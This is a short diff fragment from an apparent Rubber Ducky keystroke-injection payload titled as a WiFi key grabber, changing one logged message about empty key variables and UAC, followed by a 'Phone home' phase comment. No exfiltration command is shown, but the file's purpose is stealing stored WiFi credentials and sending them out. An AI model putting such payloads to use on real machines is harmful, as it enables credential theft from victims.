abhinavvv03/Rubber-Duckey/Payload---WiFi-key-grabber.md

 ENTER
 STRING echo If all variables are empty there was no wireless connection>>log ENTER
-STRING echo If only the key variable is empty the payload requires UAC>>log ENTER
+STRING echo If only the key variable is empty the payload requires UAC, or the authentication type isn't supported>>log ENTER

 REM FASE 3: Phone home